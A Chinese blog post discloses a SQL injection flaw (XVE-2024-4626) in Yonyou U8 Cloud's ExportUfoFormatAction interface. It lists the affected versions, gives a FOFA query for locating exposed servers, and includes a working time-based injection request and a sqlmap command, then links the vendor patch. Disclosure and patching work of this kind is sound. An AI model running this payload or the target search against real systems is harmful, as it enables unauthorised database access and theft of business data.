用友U8 Cloud ExportUfoFormatAction接口 SQL注入漏洞(XVE-2024-4626)(含POC)

已于 2024-04-04 23:00:20 修改
阅读量504 收藏
点赞数 2
CC 4.0 BY-SA版权
文章标签: web安全 sql
于 2024-04-04 22:57:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43216356/article/details/137384689
本文介绍了用友U8Cloud云ERP中的SQL注入漏洞,涉及多个版本,提供POC复现方法,并推荐官方补丁进行修复。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

**本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途。**

一、概况

用友U8cloud是用友推出的新一代云ERP,专注于成长型、创新型企业,提供企业级云ERP整体解决方案,支持多组织业务协同、营销创新、智能财务、人力服务等功能。

二、漏洞描述

用友U8 Cloud ExportUfoFormatAction接口存在SQL注入漏洞,可以构造恶意payload进行数据库访问,获取敏感信息。

三、影响版本

用友U8 Cloud 1.0,2.0,2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp

四、fofa语法

app="用友-U8-cloud"

五、漏洞复现

POC:

GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.ExportUfoFormatAction&method=&repID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: url
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

注入点是repID
SQLMAP:

python sqlmap.py -u "URL/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.ExportUfoFormatAction&method=&repID=1" -p "repID" --level 5 --risk 3

六、修复方案

官方补丁:https://security.yonyou.com/#/patchInfo?identifier=1570e29028a24472a18ee5b29436276f
Inv0ker_
关注
用友U8cloud ExportUfoFormatAction SQL注入漏洞复现(nuclei-poc
m0_50797689的博客
04-01 722
用友U8cloud ExportUfoFormatAction SQL注入漏洞复现(nuclei-poc
用友U8 Cloud ExportUfoFormatAction SQL注入漏洞复现(XVE-2024-4626)
0xSec
04-03 602
用友U8CloudExportUfoFormatAction接口存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
用友U8-cloud多个接口存在SQL注入
m0_46604997的博客
04-06 1087
U8 cloud用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案,全面支持多组织业务协同、营销创新、智能财务、人力服务,构建产业链制造平台,融合用友云服务,实现企业互联网资源连接、共享、协同,赋能中国成长型企业高速发展、云化创新。U8 cloud 多个接口存在SQL注入漏洞。攻击者可以窃取用户的隐私信息、业务数据等,造成用户信息泄露等网络安全相关问题,更严重的是数据库服务器控制有很大风险被攻击者控制。
漏洞复现】用友 U8-cloud ActionServlet sql注入漏洞
网安小白
09-15 837
CRM是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。
用友 NC FormulaViewAction SQL注入漏洞复现
0xSec
04-09 1470
用友NC /service/~iufo/com.ufida.web.action.ActionServlet 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
用友U8 Cloud API SQL注入漏洞复现(XVE-2024-9335)
0xSec
04-16 930
用友 U8 Cloud API 接口存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
用友U8 Cloud MeasureQueryByToolAction SQL注入漏洞复现(XVE-2024-4628)
0xSec
03-31 559
用友U8 CloudMeasureQueryByToolAction接口存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
用友NC checkekey SQL 注入漏洞复现(XVE-2024-37013)
0xSec
01-08 3913
用友NC中checkekey存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码,站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现--用友UFIDA NC未授权访问
qq_53003652的博客
12-12 1534
用友NC是一套功能全面、灵活度高、可定制性强的企业管理软件,能够帮助企业提升管理效率、优化资源配置、提高竞争力.该产品存在未授权访问漏洞
用友U8 Cloud selectQueryCondition SQL注入漏洞
iSee857的博客
08-24 712
用友U8 Cloud selectQueryCondition接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。yakit已支持该漏洞扫描 uuid ccfb7831-d904-4208-8304-2952456a0a23。厂商已对漏洞发布补丁。
用友php漏洞,用友漏洞存在目录整理 | CN-SEC 中文网
weixin_34637293的博客
04-10 1409
/core/public/singleplandetail.jsp /epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V /service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_...
用友GRP-u8 注入-RCE漏洞
maverickpig的博客
07-09 6222
用友GRP-u8 注入-RCE漏洞 工作中遇到的漏洞,基于前人的复现教程成功复现,记录下自己的复现笔记,如有侵权,请联系我删除 漏洞详情 用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。 该系统被曝存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。最终产生两种后果,一是可以进行SQL注入,执行SQL语句;二是导致命令执行,当用户可以控制命令执行函数中
UFO 提权漏洞分析
热门推荐
softgmx的博客
08-31 1万+
POC: https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c 内核commit 的patch https://github.com/torvalds/linux/commit/85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa Includes KASL...
用友GRP-u8 注入-RCE漏洞复现
thelostworld
12-05 3831
用友GRP-u8 注入-RCE漏洞复现 (HW第一时间复现了,当时觉得不合适,现在才发出来) 一、漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。 二、漏洞复现 SQL注入POC POST /Proxy HTTP/1.1Host:localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Ma...
电子电气架构 --- 汽车网络安全概述
Soly_kun的博客
08-02 242
汽车网络安全面临严峻挑战,随着联网汽车的普及,攻击事件呈指数级增长。本文分析了汽车行业面临的六大网络安全威胁:欺骗、篡改、不可否认性、信息泄露、拒绝服务和权限提升。文章详细阐述了联网汽车的四大攻击层面(直接物理、间接物理、无线和传感器欺骗),并指出车辆内部多个功能单元都存在安全漏洞。作者提出构建嵌入式防火墙作为多层防护方案的核心,强调其需要具备高度可配置性和模块化特点,能够适应不同电子控制单元的运行环境。通过分析吉普切诺基攻击案例,文章论证了防火墙在检测可疑活动、屏蔽恶意IP方面的重要作用,为汽车网络安全
Web安全学习步骤
JQLvopkk的博客
08-01 671
Web安全学习步骤
2024年网络安全案例
JQLvopkk的博客
08-02 449
国家级APT | 零日漏洞+持久化控制 | 网络分段,敏感数据加密 || 勒索软件 | 双重勒索+供应链渗透 | 强制启用MFA,离线加密备份 |- 手法:利用管理服务器私钥漏洞,伪造签名调用合约`withdraw`函数提取多链资产(稳定币、ETH、wBTC)。| 区块链漏洞 | 私钥管理失效+合约逻辑缺陷 | 多签冷钱包,第三方代码审计 |
网络安全专业知识体系:成为专家需要做的
zhangyihu321的专栏
08-01 690
成为顶级网络安全专家需要在技术深度、知识广度、实战经验、管理能力等多个维度达到较高水准。这不仅需要扎实的理论基础和过硬的技术技能,更需要敏锐的安全嗅觉、良好的沟通能力和持续的学习热情。网络安全是一个永远没有终点的领域,攻防技术在不断演进,新的威胁层出不穷。因此,持续学习、保持技术敏感度、紧跟行业发展趋势,是每一位志在成为顶级安全专家的专业人士必须具备的基本素质。
Kali Linux 2025.2基于MITRE ATT&CK框架
最新发布
鹿鸣天涯
08-05 269
MITRE ATT&CK(Adversarial Tactics, Techniques, and Common Knowledge)是一个全球广泛认可的网络攻击技术知识库,详细记录了攻击者在不同阶段使用的策略和技术。通过将Kali Linux的工具菜单与ATT&CK框架对齐,开发团队让用户能够根据攻击链的不同阶段(如初始访问、执行、持久化、权限提升等)快速定位所需工具。这种设计不仅提高了工具查找的效率,还让红队和蓝队在实际操作中能够更好地模拟和防御真实世界的网络攻击。
全新XVE提取工具发布,功能升级体验
8. **安全性考虑:**如果XVE格式文件包敏感信息或用于版权保护的内容,提取工具需要考虑用户认证、授权访问控制以及数据加密传输等方面的安全措施。 由于没有具体描述和详细信息,以上内容仅为可能的知识点。在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值